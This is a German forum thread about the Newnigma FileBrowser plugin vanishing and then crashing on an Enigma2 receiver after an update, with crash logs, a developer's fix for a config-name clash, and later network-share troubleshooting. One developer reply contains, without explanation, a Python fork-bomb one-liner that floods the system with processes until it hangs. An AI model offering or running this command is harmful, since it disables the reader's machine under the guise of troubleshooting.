Filebrowser (Newnigma) nach Update verschwunden

• Filebrowser (Newnigma) nach Update verschwunden

Ich habe das Problem, daß ich nach online update den Filebrowser im Newnigma Menü nicht mehr finden kann- er ist auch in den Newnigma plugins nirgends zu finden.
      Wie kann ich ihn nachinstallieren, da ich ihn auf den feeds nirgendwo finden kann (neue "daily" Feedstruktur), aber auch beim Newnigma2 Paketmanager taucht er nirgendwo auf… was ist da passiert?
      Kann mir jemand den neuesten Newnigma 2 Filemanager als standalone Datei hier einstellen?
    • Hab's gefunden, aber erst nachdem ich das (veraltete) plugin Burnseries deinstalliert hatte.
      Jetzt gibt's allerdings beim Aufrufen des Filebrowsers einen GS.

accel 1552480 bytes
      accel memstat: used=14596 kB, free 214780 kB, s 14596 kB
      accel memory: 0
      child has terminated
      pipes closed
      [91m[getPng]Not found com_HD.png in the newigma2 plugin dirs[m
      child has terminated
      pipes closed
      [91m[getPng]Not found com_HD.png in the newigma2 plugin dirs[m
      poll: unhandled POLLERR/HUP/NVAL for fd 121(16)
      poll: unhandled POLLERR/HUP/NVAL for fd 135(16)
      [POWER METER] 2718.350 Wh
      action -> SetupActions ok
      Screen <class 'Plugins.newnigma2.FileBrowser.AutofsEdit.AutoNetworkEdit'>(('/usr/lib/enigma2/python/Plugins/newnigma2/FileBrowser',), {}): <type 'exceptions.KeyError'>
      Traceback (most recent call last):
      File "/usr/lib/enigma2/python/mytest.py", line 358, in create
      return screen(self, *arguments, **kwargs)
      File "/usr/lib/enigma2/python/Plugins/newnigma2/FileBrowser/AutofsEdit.py", line 127, in __init__
      File "/usr/lib/enigma2/python/Components/config.py", line 1624, in __getattr__
      return self.content.items[name]
      KeyError: 'mp'
      Qt has caught an exception thrown from an event handler. Throwing
      exceptions from an event handler is not supported in Qt. You must
      reimplement QApplication::notify() and catch all exceptions there.

swig director exception (SWIG director method error.)

0x75de7cf4 <QEventLoop::exec(QFlags<QEventLoop::ProcessEventsFlag>)+0x564>
      0x75def4c0 <QCoreApplication::exec()+0xb0>
      0x7c9c54 <eMainloopQt::runLoop()+0x1c>
      0x629e68 </usr/bin/enigma2()>
      0x75358d64 </usr/lib/libpython2.7.so.1.0(PyEval_EvalFrameEx+0x58a0)>

Traceback (most recent call last):
      File "/usr/lib/enigma2/python/enigma.py", line 6192, in __call__
      return ret(*args, **kwargs)
      File "/usr/lib/enigma2/python/Components/ActionMap.py", line 47, in action
      res = self.actions[action]()
      File "/usr/lib/enigma2/python/Plugins/newnigma2/Menu/MainMenu.py", line 102, in keyOK
      File "/usr/lib/enigma2/python/Screens/Menu.py", line 47, in __call__
      self.fnc(*self.args)
      File "/usr/lib/enigma2/python/Plugins/newnigma2/FileBrowser/plugin.py", line 110, in YYY
      File "/usr/lib/enigma2/python/mytest.py", line 461, in open
      dlg.isTmp = True
      AttributeError: 'NoneType' object has no attribute 'isTmp'
      -------
      Dateien

Dieser Beitrag wurde bereits 3 mal editiert, zuletzt von diogenes ()

• Ja entferne den mal hab das hier mal nachgestellt das liegt daran ich werde mal gucken das ich das unterbinde.
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
    • Da ich übersehen habe das der filebrowser von schwerkraft.elitedvb.net also der andere den gleichen config namen verwendet habe ich den unseren verändert damit es keine überschneidungen mehr gibt
      das heisst aber auch das alle einstellungen im plugin neu eingegeben werden müssen dann können sogar beide verwendet warum auch immer man das will.
    • Der neue Browser funktioniert, aber nur mit Ausnahmen...

Der neue Newnigma FileBrowser funktioniert zwar, aber es läßt sich bei mir nur eine Verbindung zur Dreambox 8000 herstellen, beim Versuch, eine Verbindung zu meinem Windows Server herzustellen, wird zwar der Name des Servers angezeigt, aber die Freigabe nicht geöffnet, es erscheinen also keine
      Dateien und Unterordner auf der Serverplatte wie früher- auf meiner DM8000 funktioniert alles (OE 2.0), also alle Verbindungen zu den Windows Servern funktionieren wie gewohnt.
      Was läuft da falsch?
      Mache ich beim Erstellen der Automount Datei etwas falsch?
    • Wenn die nicht aufgeht hatt das nichts mit dem filebrowser zutun sondern deine freigabe stimmt nicht aber zeig mal deine auto.network
    • Jetzt geht alles wieder- ich habe zuerst ein früheres Backup (v. 05.12 2015) mit dBackup geflasht, dann den Newnigma Filebrowser zum Laufen gebracht, und schließlich das Online Update auf die neueste Version durchgeführt.
      Es war nichts falsch an den Netzwerksettings….